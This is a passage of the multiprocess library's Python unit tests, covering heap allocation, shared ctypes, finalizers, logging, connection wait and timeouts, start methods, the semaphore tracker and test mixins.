self.Pipe(duplex=False) conn.send(w) w.close() self.assertEqual(r.recv(), 'all is well') r.close() r, w = self.Pipe(duplex=False) conn.send(r) r.close() w.send('foobar') w.close() self.assertEqual(conn.recv(), 'foobar'*2) p.join() # # # class _TestHeap(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_heap(self): iterations = 5000 maxblocks = 50 blocks = [] # create and destroy lots of blocks of different sizes for i in range(iterations): size = int(random.lognormvariate(0, 1) * 1000) b = multiprocess.heap.BufferWrapper(size) blocks.append(b) if len(blocks) > maxblocks: i = random.randrange(maxblocks) del blocks[i] # get the heap object heap = multiprocess.heap.BufferWrapper._heap # verify the state of the heap all = [] occupied = 0 heap._lock.acquire() self.addCleanup(heap._lock.release) for L in list(heap._len_to_seq.values()): for arena, start, stop in L: all.append((heap._arenas.index(arena), start, stop, stop-start, 'free')) for arena, start, stop in heap._allocated_blocks: all.append((heap._arenas.index(arena), start, stop, stop-start, 'occupied')) occupied += (stop-start) all.sort() for i in range(len(all)-1): (arena, start, stop) = all[i][:3] (narena, nstart, nstop) = all[i+1][:3] self.assertTrue((arena != narena and nstart == 0) or (stop == nstart)) def test_free_from_gc(self): # Check that freeing of blocks by the garbage collector doesn't deadlock # (issue #12352). # Make sure the GC is enabled, and set lower collection thresholds to # make collections more frequent (and increase the probability of # deadlock). if not gc.isenabled(): gc.enable() self.addCleanup(gc.disable) thresholds = gc.get_threshold() self.addCleanup(gc.set_threshold, *thresholds) gc.set_threshold(10) # perform numerous block allocations, with cyclic references to make # sure objects are collected asynchronously by the gc for i in range(5000): a = multiprocess.heap.BufferWrapper(1) b = multiprocess.heap.BufferWrapper(1) # circular references a.buddy = b b.buddy = a # # # class _Foo(Structure): _fields_ = [ ('x', c_int), ('y', c_double) ] class _TestSharedCTypes(BaseTestCase): ALLOWED_TYPES = ('processes',) def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocess.sharedctypes") @classmethod def _double(cls, x, y, foo, arr, string): x.value *= 2 y.value *= 2 foo.x *= 2 foo.y *= 2 string.value *= 2 for i in range(len(arr)): arr[i] *= 2 def test_sharedctypes(self, lock=False): x = Value('i', 7, lock=lock) y = Value(c_double, 1.0/3.0, lock=lock) foo = Value(_Foo, 3, 2, lock=lock) arr = self.Array('d', list(range(10)), lock=lock) string = self.Array('c', 20, lock=lock) string.value = latin('hello') p = self.Process(target=self._double, args=(x, y, foo, arr, string)) p.daemon = True p.start() p.join() self.assertEqual(x.value, 14) self.assertAlmostEqual(y.value, 2.0/3.0) self.assertEqual(foo.x, 6) self.assertAlmostEqual(foo.y, 4.0) for i in range(10): self.assertAlmostEqual(arr[i], i*2) self.assertEqual(string.value, latin('hellohello')) def test_synchronize(self): self.test_sharedctypes(lock=True) def test_copy(self): foo = _Foo(2, 5.0) bar = copy(foo) foo.x = 0 foo.y = 0 self.assertEqual(bar.x, 2) self.assertAlmostEqual(bar.y, 5.0) # # # class _TestFinalize(BaseTestCase): ALLOWED_TYPES = ('processes',) def setUp(self): self.registry_backup = util._finalizer_registry.copy() util._finalizer_registry.clear() def tearDown(self): self.assertFalse(util._finalizer_registry) util._finalizer_registry.update(self.registry_backup) @classmethod def _test_finalize(cls, conn): class Foo(object): pass a = Foo() util.Finalize(a, conn.send, args=('a',)) del a # triggers callback for a b = Foo() close_b = util.Finalize(b, conn.send, args=('b',)) close_b() # triggers callback for b close_b() # does nothing because callback has already been called del b # does nothing because callback has already been called c = Foo() util.Finalize(c, conn.send, args=('c',)) d10 = Foo() util.Finalize(d10, conn.send, args=('d10',), exitpriority=1) d01 = Foo() util.Finalize(d01, conn.send, args=('d01',), exitpriority=0) d02 = Foo() util.Finalize(d02, conn.send, args=('d02',), exitpriority=0) d03 = Foo() util.Finalize(d03, conn.send, args=('d03',), exitpriority=0) util.Finalize(None, conn.send, args=('e',), exitpriority=-10) util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100) # call multiprocess's cleanup function then exit process without # garbage collecting locals util._exit_function() conn.close() os._exit(0) def test_finalize(self): conn, child_conn = self.Pipe() p = self.Process(target=self._test_finalize, args=(child_conn,)) p.daemon = True p.start() p.join() result = [obj for obj in iter(conn.recv, 'STOP')] self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e']) def test_thread_safety(self): # bpo-24484: _run_finalizers() should be thread-safe def cb(): pass class Foo(object): def __init__(self): self.ref = self # create reference cycle # insert finalizer at random key util.Finalize(self, cb, exitpriority=random.randint(1, 100)) finish = False exc = None def run_finalizers(): nonlocal exc while not finish: time.sleep(random.random() * 1e-1) try: # A GC run will eventually happen during this, # collecting stale Foo's and mutating the registry util._run_finalizers() except Exception as e: exc = e def make_finalizers(): nonlocal exc d = {} while not finish: try: # Old Foo's get gradually replaced and later # collected by the GC (because of the cyclic ref) d[random.getrandbits(5)] = {Foo() for i in range(10)} except Exception as e: exc = e d.clear() old_interval = sys.getswitchinterval() old_threshold = gc.get_threshold() try: sys.setswitchinterval(1e-6) gc.set_threshold(5, 5, 5) threads = [threading.Thread(target=run_finalizers), threading.Thread(target=make_finalizers)] with support.start_threads(threads): time.sleep(4.0) # Wait a bit to trigger race condition finish = True if exc is not None: raise exc finally: sys.setswitchinterval(old_interval) gc.set_threshold(*old_threshold) gc.collect() # Collect remaining Foo's # # Test that from ... import * works for each module # class _TestImportStar(unittest.TestCase): def get_module_names(self): import glob folder = os.path.dirname(multiprocess.__file__) pattern = os.path.join(folder, '*.py') files = glob.glob(pattern) modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files] modules = ['multiprocess.' + m for m in modules] modules.remove('multiprocess.__init__') modules.append('multiprocess') return modules def test_import(self): modules = self.get_module_names() if sys.platform == 'win32': modules.remove('multiprocess.popen_fork') modules.remove('multiprocess.popen_forkserver') modules.remove('multiprocess.popen_spawn_posix') else: modules.remove('multiprocess.popen_spawn_win32') if not HAS_REDUCTION: modules.remove('multiprocess.popen_forkserver') if c_int is None: # This module requires _ctypes modules.remove('multiprocess.sharedctypes') for name in modules: __import__(name) mod = sys.modules[name] self.assertTrue(hasattr(mod, '__all__'), name) for attr in mod.__all__: self.assertTrue( hasattr(mod, attr), '%r does not have attribute %r' % (mod, attr) ) # # Quick test that logging works -- does not test logging output # class _TestLogging(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_enable_logging(self): logger = multiprocess.get_logger() logger.setLevel(util.SUBWARNING) self.assertTrue(logger is not None) logger.debug('this will not be printed') logger.info('nor will this') logger.setLevel(LOG_LEVEL) @classmethod def _test_level(cls, conn): logger = multiprocess.get_logger() conn.send(logger.getEffectiveLevel()) def test_level(self): LEVEL1 = 32 LEVEL2 = 37 logger = multiprocess.get_logger() root_logger = logging.getLogger() root_level = root_logger.level reader, writer = multiprocess.Pipe(duplex=False) logger.setLevel(LEVEL1) p = self.Process(target=self._test_level, args=(writer,)) p.start() self.assertEqual(LEVEL1, reader.recv()) p.join() logger.setLevel(logging.NOTSET) root_logger.setLevel(LEVEL2) p = self.Process(target=self._test_level, args=(writer,)) p.start() self.assertEqual(LEVEL2, reader.recv()) p.join() root_logger.setLevel(root_level) logger.setLevel(level=LOG_LEVEL) # class _TestLoggingProcessName(BaseTestCase): # # def handle(self, record): # assert record.processName == multiprocess.current_process().name # self.__handled = True # # def test_logging(self): # handler = logging.Handler() # handler.handle = self.handle # self.__handled = False # # Bypass getLogger() and side-effects # logger = logging.getLoggerClass()( # 'multiprocess.test.TestLoggingProcessName') # logger.addHandler(handler) # logger.propagate = False # # logger.warn('foo') # assert self.__handled # # Check that Process.join() retries if os.waitpid() fails with EINTR # class _TestPollEintr(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def _killer(cls, pid): time.sleep(0.1) os.kill(pid, signal.SIGUSR1) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_poll_eintr(self): got_signal = [False] def record(*args): got_signal[0] = True pid = os.getpid() oldhandler = signal.signal(signal.SIGUSR1, record) try: killer = self.Process(target=self._killer, args=(pid,)) killer.start() try: p = self.Process(target=time.sleep, args=(2,)) p.start() p.join() finally: killer.join() self.assertTrue(got_signal[0]) self.assertEqual(p.exitcode, 0) finally: signal.signal(signal.SIGUSR1, oldhandler) # # Test to verify handle verification, see issue 3321 # class TestInvalidHandle(unittest.TestCase): @unittest.skipIf(WIN32, "skipped on Windows") def test_invalid_handles(self): conn = multiprocess.connection.Connection(44977608) # check that poll() doesn't crash try: conn.poll() except (ValueError, OSError): pass finally: # Hack private attribute _handle to avoid printing an error # in conn.__del__ conn._handle = None self.assertRaises((ValueError, OSError), multiprocess.connection.Connection, -1) class OtherTest(unittest.TestCase): # TODO: add more tests for deliver/answer challenge. def test_deliver_challenge_auth_failure(self): class _FakeConnection(object): def recv_bytes(self, size): return b'something bogus' def send_bytes(self, data): pass self.assertRaises(multiprocess.AuthenticationError, multiprocess.connection.deliver_challenge, _FakeConnection(), b'abc') def test_answer_challenge_auth_failure(self): class _FakeConnection(object): def __init__(self): self.count = 0 def recv_bytes(self, size): self.count += 1 if self.count == 1: return multiprocess.connection.CHALLENGE elif self.count == 2: return b'something bogus' return b'' def send_bytes(self, data): pass self.assertRaises(multiprocess.AuthenticationError, multiprocess.connection.answer_challenge, _FakeConnection(), b'abc') # # Test Manager.start()/Pool.__init__() initializer feature - see issue 5585 # def initializer(ns): ns.test += 1 class TestInitializers(unittest.TestCase): def setUp(self): self.mgr = multiprocess.Manager() self.ns = self.mgr.Namespace() self.ns.test = 0 def tearDown(self): self.mgr.shutdown() self.mgr.join() def test_manager_initializer(self): m = multiprocess.managers.SyncManager() self.assertRaises(TypeError, m.start, 1) m.start(initializer, (self.ns,)) self.assertEqual(self.ns.test, 1) m.shutdown() m.join() def test_pool_initializer(self): self.assertRaises(TypeError, multiprocess.Pool, initializer=1) p = multiprocess.Pool(1, initializer, (self.ns,)) p.close() p.join() self.assertEqual(self.ns.test, 1) # # Issue 5155, 5313, 5331: Test process in processes # Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior # def _this_sub_process(q): try: item = q.get(block=False) except pyqueue.Empty: pass def _test_process(): queue = multiprocess.Queue() subProc = multiprocess.Process(target=_this_sub_process, args=(queue,)) subProc.daemon = True subProc.start() subProc.join() def _afunc(x): return x*x def pool_in_process(): pool = multiprocess.Pool(processes=4) x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7]) pool.close() pool.join() class _file_like(object): def __init__(self, delegate): self._delegate = delegate self._pid = None @property def cache(self): pid = os.getpid() # There are no race conditions since fork keeps only the running thread if pid != self._pid: self._pid = pid self._cache = [] return self._cache def write(self, data): self.cache.append(data) def flush(self): self._delegate.write(''.join(self.cache)) self._cache = [] class TestStdinBadfiledescriptor(unittest.TestCase): def test_queue_in_process(self): proc = multiprocess.Process(target=_test_process) proc.start() proc.join() def test_pool_in_process(self): p = multiprocess.Process(target=pool_in_process) p.start() p.join() def test_flushing(self): sio = io.StringIO() flike = _file_like(sio) flike.write('foo') proc = multiprocess.Process(target=lambda: flike.flush()) flike.flush() assert sio.getvalue() == 'foo' class TestWait(unittest.TestCase): @classmethod def _child_test_wait(cls, w, slow): for i in range(10): if slow: time.sleep(random.random()*0.1) w.send((i, os.getpid())) w.close() def test_wait(self, slow=False): from multiprocess.connection import wait readers = [] procs = [] messages = [] for i in range(4): r, w = multiprocess.Pipe(duplex=False) p = multiprocess.Process(target=self._child_test_wait, args=(w, slow)) p.daemon = True p.start() w.close() readers.append(r) procs.append(p) self.addCleanup(p.join) while readers: for r in wait(readers): try: msg = r.recv() except EOFError: readers.remove(r) r.close() else: messages.append(msg) messages.sort() expected = sorted((i, p.pid) for i in range(10) for p in procs) self.assertEqual(messages, expected) @classmethod def _child_test_wait_socket(cls, address, slow): s = socket.socket() s.connect(address) for i in range(10): if slow: time.sleep(random.random()*0.1) s.sendall(('%s\n' % i).encode('ascii')) s.close() def test_wait_socket(self, slow=False): from multiprocess.connection import wait l = socket.socket() l.bind((support.HOST, 0)) l.listen() addr = l.getsockname() readers = [] procs = [] dic = {} for i in range(4): p = multiprocess.Process(target=self._child_test_wait_socket, args=(addr, slow)) p.daemon = True p.start() procs.append(p) self.addCleanup(p.join) for i in range(4): r, _ = l.accept() readers.append(r) dic[r] = [] l.close() while readers: for r in wait(readers): msg = r.recv(32) if not msg: readers.remove(r) r.close() else: dic[r].append(msg) expected = ''.join('%s\n' % i for i in range(10)).encode('ascii') for v in dic.values(): self.assertEqual(b''.join(v), expected) def test_wait_slow(self): self.test_wait(True) def test_wait_socket_slow(self): self.test_wait_socket(True) def test_wait_timeout(self): from multiprocess.connection import wait expected = 5 a, b = multiprocess.Pipe() start = time.time() res = wait([a, b], expected) delta = time.time() - start self.assertEqual(res, []) self.assertLess(delta, expected * 2) self.assertGreater(delta, expected * 0.5) b.send(None) start = time.time() res = wait([a, b], 20) delta = time.time() - start self.assertEqual(res, [a]) self.assertLess(delta, 0.4) @classmethod def signal_and_sleep(cls, sem, period): sem.release() time.sleep(period) def test_wait_integer(self): from multiprocess.connection import wait expected = 3 sorted_ = lambda l: sorted(l, key=lambda x: id(x)) sem = multiprocess.Semaphore(0) a, b = multiprocess.Pipe() p = multiprocess.Process(target=self.signal_and_sleep, args=(sem, expected)) p.start() self.assertIsInstance(p.sentinel, int) self.assertTrue(sem.acquire(timeout=20)) start = time.time() res = wait([a, p.sentinel, b], expected + 20) delta = time.time() - start self.assertEqual(res, [p.sentinel]) self.assertLess(delta, expected + 2) self.assertGreater(delta, expected - 2) a.send(None) start = time.time() res = wait([a, p.sentinel, b], 20) delta = time.time() - start self.assertEqual(sorted_(res), sorted_([p.sentinel, b])) self.assertLess(delta, 0.4) b.send(None) start = time.time() res = wait([a, p.sentinel, b], 20) delta = time.time() - start self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b])) self.assertLess(delta, 0.4) p.terminate() p.join() def test_neg_timeout(self): from multiprocess.connection import wait a, b = multiprocess.Pipe() t = time.time() res = wait([a], timeout=-1) t = time.time() - t self.assertEqual(res, []) self.assertLess(t, 1) a.close() b.close() # # Issue 14151: Test invalid family on invalid environment # class TestInvalidFamily(unittest.TestCase): @unittest.skipIf(WIN32, "skipped on Windows") def test_invalid_family(self): with self.assertRaises(ValueError): multiprocess.connection.Listener(r'\\.\test') @unittest.skipUnless(WIN32, "skipped on non-Windows platforms") def test_invalid_family_win32(self): with self.assertRaises(ValueError): multiprocess.connection.Listener('/var/test.pipe') # # Issue 12098: check sys.flags of child matches that for parent # class TestFlags(unittest.TestCase): @classmethod def run_in_grandchild(cls, conn): conn.send(tuple(sys.flags)) @classmethod def run_in_child(cls): import json r, w = multiprocess.Pipe(duplex=False) p = multiprocess.Process(target=cls.run_in_grandchild, args=(w,)) p.start() grandchild_flags = r.recv() p.join() r.close() w.close() flags = (tuple(sys.flags), grandchild_flags) print(json.dumps(flags)) def _test_flags(self): import json, subprocess # start child process using unusual flags prog = ('from multiprocess.tests import TestFlags; ' + 'TestFlags.run_in_child()') data = subprocess.check_output( [sys.executable, '-E', '-S', '-O', '-c', prog]) child_flags, grandchild_flags = json.loads(data.decode('ascii')) self.assertEqual(child_flags, grandchild_flags) # # Test interaction with socket timeouts - see Issue #6056 # class TestTimeouts(unittest.TestCase): @classmethod def _test_timeout(cls, child, address): time.sleep(1) child.send(123) child.close() conn = multiprocess.connection.Client(address) conn.send(456) conn.close() def test_timeout(self): old_timeout = socket.getdefaulttimeout() try: socket.setdefaulttimeout(0.1) parent, child = multiprocess.Pipe(duplex=True) l = multiprocess.connection.Listener(family='AF_INET') p = multiprocess.Process(target=self._test_timeout, args=(child, l.address)) p.start() child.close() self.assertEqual(parent.recv(), 123) parent.close() conn = l.accept() self.assertEqual(conn.recv(), 456) conn.close() l.close() p.join(10) finally: socket.setdefaulttimeout(old_timeout) # # Test what happens with no "if __name__ == '__main__'" # class TestNoForkBomb(unittest.TestCase): def test_noforkbomb(self): sm = multiprocess.get_start_method() name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py') if sm != 'fork': rc, out, err = support.script_helper.assert_python_failure(name, sm) self.assertEqual(out, b'') self.assertIn(b'RuntimeError', err) else: rc, out, err = support.script_helper.assert_python_ok(name, sm) self.assertEqual(out.rstrip(), b'123') self.assertEqual(err, b'') # # Issue #17555: ForkAwareThreadLock # class TestForkAwareThreadLock(unittest.TestCase): # We recursively start processes. Issue #17555 meant that the # after fork registry would get duplicate entries for the same # lock. The size of the registry at generation n was ~2**n. @classmethod def child(cls, n, conn): if n > 1: p = multiprocess.Process(target=cls.child, args=(n-1, conn)) p.start() conn.close() p.join(timeout=5) else: conn.send(len(util._afterfork_registry)) conn.close() def test_lock(self): r, w = multiprocess.Pipe(False) l = util.ForkAwareThreadLock() old_size = len(util._afterfork_registry) p = multiprocess.Process(target=self.child, args=(5, w)) p.start() w.close() new_size = r.recv() p.join(timeout=5) self.assertLessEqual(new_size, old_size) # # Check that non-forked child processes do not inherit unneeded fds/handles # class TestCloseFds(unittest.TestCase): def get_high_socket_fd(self): if WIN32: # The child process will not have any socket handles, so # calling socket.fromfd() should produce WSAENOTSOCK even # if there is a handle of the same number. return socket.socket().detach() else: # We want to produce a socket with an fd high enough that a # freshly created child process will not have any fds as high. fd = socket.socket().detach() to_close = [] while fd < 50: to_close.append(fd) fd = os.dup(fd) for x in to_close: os.close(x) return fd def close(self, fd): if WIN32: socket.socket(fileno=fd).close() else: os.close(fd) @classmethod def _test_closefds(cls, conn, fd): try: s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM) except Exception as e: conn.send(e) else: s.close() conn.send(None) def test_closefd(self): if not HAS_REDUCTION: raise unittest.SkipTest('requires fd pickling') reader, writer = multiprocess.Pipe() fd = self.get_high_socket_fd() try: p = multiprocess.Process(target=self._test_closefds, args=(writer, fd)) p.start() writer.close() e = reader.recv() p.join(timeout=5) finally: self.close(fd) writer.close() reader.close() if multiprocess.get_start_method() == 'fork': self.assertIs(e, None) else: WSAENOTSOCK = 10038 self.assertIsInstance(e, OSError) self.assertTrue(e.errno == errno.EBADF or e.winerror == WSAENOTSOCK, e) # # Issue #17097: EINTR should be ignored by recv(), send(), accept() etc # class TestIgnoreEINTR(unittest.TestCase): # Sending CONN_MAX_SIZE bytes into a multiprocess pipe must block CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE) @classmethod def _test_ignore(cls, conn): def handler(signum, frame): pass signal.signal(signal.SIGUSR1, handler) conn.send('ready') x = conn.recv() conn.send(x) conn.send_bytes(b'x' * cls.CONN_MAX_SIZE) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_ignore(self): conn, child_conn = multiprocess.Pipe() try: p = multiprocess.Process(target=self._test_ignore, args=(child_conn,)) p.daemon = True p.start() child_conn.close() self.assertEqual(conn.recv(), 'ready') time.sleep(0.1) os.kill(p.pid, signal.SIGUSR1) time.sleep(0.1) conn.send(1234) self.assertEqual(conn.recv(), 1234) time.sleep(0.1) os.kill(p.pid, signal.SIGUSR1) self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE) time.sleep(0.1) p.join() finally: conn.close() @classmethod def _test_ignore_listener(cls, conn): def handler(signum, frame): pass signal.signal(signal.SIGUSR1, handler) with multiprocess.connection.Listener() as l: conn.send(l.address) a = l.accept() a.send('welcome') @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_ignore_listener(self): conn, child_conn = multiprocess.Pipe() try: p = multiprocess.Process(target=self._test_ignore_listener, args=(child_conn,)) p.daemon = True p.start() child_conn.close() address = conn.recv() time.sleep(0.1) os.kill(p.pid, signal.SIGUSR1) time.sleep(0.1) client = multiprocess.connection.Client(address) self.assertEqual(client.recv(), 'welcome') p.join() finally: conn.close() class TestStartMethod(unittest.TestCase): @classmethod def _check_context(cls, conn): conn.send(multiprocess.get_start_method()) def check_context(self, ctx): r, w = ctx.Pipe(duplex=False) p = ctx.Process(target=self._check_context, args=(w,)) p.start() w.close() child_method = r.recv() r.close() p.join() self.assertEqual(child_method, ctx.get_start_method()) def _test_context(self): for method in ('fork', 'spawn', 'forkserver'): try: ctx = multiprocess.get_context(method) except ValueError: continue self.assertEqual(ctx.get_start_method(), method) self.assertIs(ctx.get_context(), ctx) self.assertRaises(ValueError, ctx.set_start_method, 'spawn') self.assertRaises(ValueError, ctx.set_start_method, None) self.check_context(ctx) def _test_set_get(self): multiprocess.set_forkserver_preload(PRELOAD) count = 0 old_method = multiprocess.get_start_method() try: for method in ('fork', 'spawn', 'forkserver'): try: multiprocess.set_start_method(method, force=True) except ValueError: continue self.assertEqual(multiprocess.get_start_method(), method) ctx = multiprocess.get_context() self.assertEqual(ctx.get_start_method(), method) self.assertTrue(type(ctx).__name__.lower().startswith(method)) self.assertTrue( ctx.Process.__name__.lower().startswith(method)) self.check_context(multiprocess) count += 1 finally: multiprocess.set_start_method(old_method, force=True) self.assertGreaterEqual(count, 1) def test_get_all(self): methods = multiprocess.get_all_start_methods() if sys.platform == 'win32': self.assertEqual(methods, ['spawn']) else: self.assertTrue(methods == ['fork', 'spawn'] or methods == ['fork', 'spawn', 'forkserver']) def test_preload_resources(self): if multiprocess.get_start_method() != 'forkserver': self.skipTest("test only relevant for 'forkserver' method") name = os.path.join(os.path.dirname(__file__), 'mp_preload.py') rc, out, err = support.script_helper.assert_python_ok(name) out = out.decode() err = err.decode() if out.rstrip() != 'ok' or err != '': print(out) print(err) self.fail("failed spawning forkserver or grandchild") @unittest.skipIf(sys.platform == "win32", "test semantics don't make sense on Windows") class TestSemaphoreTracker(unittest.TestCase): def _test_semaphore_tracker(self): # # Check that killing process does not leak named semaphores # import subprocess cmd = '''if 1: import multiprocess as mp, time, os mp.set_start_method("spawn") lock1 = mp.Lock() lock2 = mp.Lock() os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n") os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n") time.sleep(10) ''' r, w = os.pipe() p = subprocess.Popen([sys.executable, '-E', '-c', cmd % (w, w)], pass_fds=[w], stderr=subprocess.PIPE) os.close(w) with open(r, 'rb', closefd=True) as f: name1 = f.readline().rstrip().decode('ascii') name2 = f.readline().rstrip().decode('ascii') _multiprocessing.sem_unlink(name1) p.terminate() p.wait() time.sleep(2.0) with self.assertRaises(OSError) as ctx: _multiprocessing.sem_unlink(name2) # docs say it should be ENOENT, but OSX seems to give EINVAL self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL)) err = p.stderr.read().decode('utf-8') p.stderr.close() expected = 'semaphore_tracker: There appear to be 2 leaked semaphores' self.assertRegex(err, expected) self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1) def check_semaphore_tracker_death(self, signum, should_die): # bpo-31310: if the semaphore tracker process has died, it should # be restarted implicitly. from multiprocess.semaphore_tracker import _semaphore_tracker _semaphore_tracker.ensure_running() pid = _semaphore_tracker._pid os.kill(pid, signum) time.sleep(1.0) # give it time to die ctx = multiprocess.get_context("spawn") with contextlib.ExitStack() as stack: if should_die: stack.enter_context(self.assertWarnsRegex( UserWarning, "semaphore_tracker: process died")) sem = ctx.Semaphore() sem.acquire() sem.release() wr = weakref.ref(sem) # ensure `sem` gets collected, which triggers communication with # the semaphore tracker del sem gc.collect() self.assertIsNone(wr()) def test_semaphore_tracker_sigint(self): # Catchable signal (ignored by semaphore tracker) self.check_semaphore_tracker_death(signal.SIGINT, False) def test_semaphore_tracker_sigkill(self): # Uncatchable signal. self.check_semaphore_tracker_death(signal.SIGKILL, True) class TestSimpleQueue(unittest.TestCase): @classmethod def _test_empty(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() # issue 30301, could fail under spawn and forkserver try: queue.put(queue.empty()) queue.put(queue.empty()) finally: parent_can_continue.set() def test_empty(self): queue = multiprocess.SimpleQueue() child_can_start = multiprocess.Event() parent_can_continue = multiprocess.Event() proc = multiprocess.Process( target=self._test_empty, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertTrue(queue.empty()) child_can_start.set() parent_can_continue.wait() self.assertFalse(queue.empty()) self.assertEqual(queue.get(), True) self.assertEqual(queue.get(), False) self.assertTrue(queue.empty()) proc.join() # # Mixins # class BaseMixin(object): @classmethod def setUpClass(cls): cls.dangling = (multiprocess.process._dangling.copy(), threading._dangling.copy()) @classmethod def tearDownClass(cls): # bpo-26762: Some multiprocess objects like Pool create reference # cycles. Trigger a garbage collection to break these cycles. support.gc_collect() processes = set(multiprocess.process._dangling) - set(cls.dangling[0]) if processes: print('Warning -- Dangling processes: %s' % processes, file=sys.stderr) processes = None threads = set(threading._dangling) - set(cls.dangling[1]) if threads: print('Warning -- Dangling threads: %s' % threads, file=sys.stderr) threads = None class ProcessesMixin(BaseMixin): TYPE = 'processes' Process = multiprocess.Process connection = multiprocess.connection current_process = staticmethod(multiprocess.current_process) active_children = staticmethod(multiprocess.active_children) Pool = staticmethod(multiprocess.Pool) Pipe = staticmethod(multiprocess.Pipe) Queue = staticmethod(multiprocess.Queue) JoinableQueue = staticmethod(multiprocess.JoinableQueue) Lock = staticmethod(multiprocess.Lock) RLock = staticmethod(multiprocess.RLock) Semaphore = staticmethod(multiprocess.Semaphore) BoundedSemaphore = staticmethod(multiprocess.BoundedSemaphore) Condition = staticmethod(multiprocess.Condition) Event = staticmethod(multiprocess.Event) Barrier = staticmethod(multiprocess.Barrier) Value = staticmethod(multiprocess.Value) Array = staticmethod(multiprocess.Array) RawValue = staticmethod(multiprocess.RawValue) RawArray = staticmethod(multiprocess.RawArray) class ManagerMixin(BaseMixin): TYPE = 'manager' Process = multiprocess.Process Queue = property(operator.attrgetter('manager.Queue')) JoinableQueue = property(operator.attrgetter('manager.JoinableQueue')) Lock = property(operator.attrgetter('manager.Lock')) RLock = property(operator.attrgetter('manager.RLock')) Semaphore = property(operator.attrgetter('manager.Semaphore')) BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore')) Condition = property(operator.attrgetter('manager.Condition')) Event = property(operator.attrgetter('manager.Event')) Barrier = property(operator.attrgetter('manager.Barrier')) Value = property(operator.attrgetter('manager.Value')) Array = property(operator.attrgetter('manager.Array')) list = property(operator.attrgetter('manager.list')) dict = property(operator.attrgetter('manager.dict')) Namespace = property(operator.attrgetter('manager.Namespace')) @classmethod def Pool(cls, *args, **kwds): return cls.manager.Pool(*args, **kwds) @classmethod def setUpClass(cls): super().setUpClass() cls.manager = multiprocess.Manager() @classmethod def tearDownClass(cls): # only the manager process should be returned by active_children() # but this can take a bit on slow machines, so wait a few seconds # if there are other children too (see #17395) start_time = time.monotonic() t = 0.01 while len(multiprocess.active_children()) > 1: time.sleep(t) t *= 2 dt = time.monotonic() - start_time if dt >= 5.0: print("Warning -- multiprocess.Manager still has %s active " "children after %s seconds" % (multiprocess.active_children(), dt), file=sys.stderr) break gc.collect() # do garbage collection if cls.manager._number_of_objects() != 0: # This is not really an error since some tests do not # ensure that all processes which hold a reference to a # managed object have been joined. print('Warning -- Shared objects which still exist at manager ' 'shutdown:') print(cls.manager._debug_info()) cls.manager.shutdown() cls.manager.join() cls.manager = None super().tearDownClass() class ThreadsMixin(BaseMixin): TYPE = 'threads' Process = multiprocess.dummy.Process connection = multiprocess.dummy.connection current_process = staticmethod(multiprocess.dummy.current_process) active_children = staticmethod(multiprocess.dummy.active_children) Pool = staticmethod(multiprocess.dummy.Pool) Pipe = staticmethod(multiprocess.dummy.Pipe) Queue = staticmethod(multiprocess.dummy.Queue) JoinableQueue = staticmethod(multiprocess.dummy.JoinableQueue) Lock = staticmethod(multiprocess.dummy.Lock) RLock = staticmethod(multiprocess.dummy.RLock) Semaphore = staticmethod(multiprocess.dummy.Semaphore) BoundedSemaphore = staticmethod(multiprocess.dummy.BoundedSemaphore) Condition = staticmethod(multiprocess.dummy.Condition) Event = staticmethod(multiprocess.dummy.Event) Barrier = staticmethod(multiprocess.dummy.Barrier) Value = staticmethod(multiprocess.dummy.Value) Array = staticmethod(multiprocess.dummy.Array) # # Functions used to create test cases from the base ones in this module # def install_tests_in_module_dict(remote_globs, start_method): __module__ = remote_globs['__name__'] local_globs = globals() ALL_TYPES = {'processes', 'threads', 'manager'} for name, base in local_globs.items(): if not isinstance(base, type): continue if issubclass(base, BaseTestCase): if base is BaseTestCase: continue assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES for type_ in base.ALLOWED_TYPES: newname = 'With' + type_.capitalize() + name[1:] Mixin = local_globs[type_.capitalize() + 'Mixin'] class Temp(base, Mixin, unittest.TestCase): pass Temp.__name__ = Temp.__qualname__ = newname Temp.__module__ = __module__ remote_globs[newname] = Temp elif issubclass(base, unittest.TestCase): class Temp(base, object): pass Temp.__name__ = Temp.__qualname__ = name Temp.__module__ = __module__ remote_globs[name] = Temp dangling = [None, None] old_start_method = [None] def setUpModule(): multiprocess.set_forkserver_preload(PRELOAD) multiprocess.process._cleanup() dangling[0] = multiprocess.process._dangling.copy() dangling[1] = threading._dangling.copy() old_start_method[0] = multiprocess.get_start_method(allow_none=True) try: multiprocess.set_start_method(start_method, force=True) except ValueError: raise unittest.SkipTest(start_method + ' start method not supported') if sys.platform.startswith("linux"): try: lock = multiprocess.RLock() except OSError: raise unittest.SkipTest("OSError raises on RLock creation, " "see issue 3111!") check_enough_semaphores() util.get_temp_dir() # creates temp directory multiprocess.get_logger().setLevel(LOG_LEVEL) def tearDownModule(): need_sleep = False # bpo-26762: Some multiprocess objects like Pool create reference # cycles. Trigger a garbage collection to break these cycles. support.gc_collect() multiprocess.set_start_method(old_start_method[0], force=True) # pause a bit so we don't get warning about dangling threads/processes processes = set(multiprocess.process._dangling) - 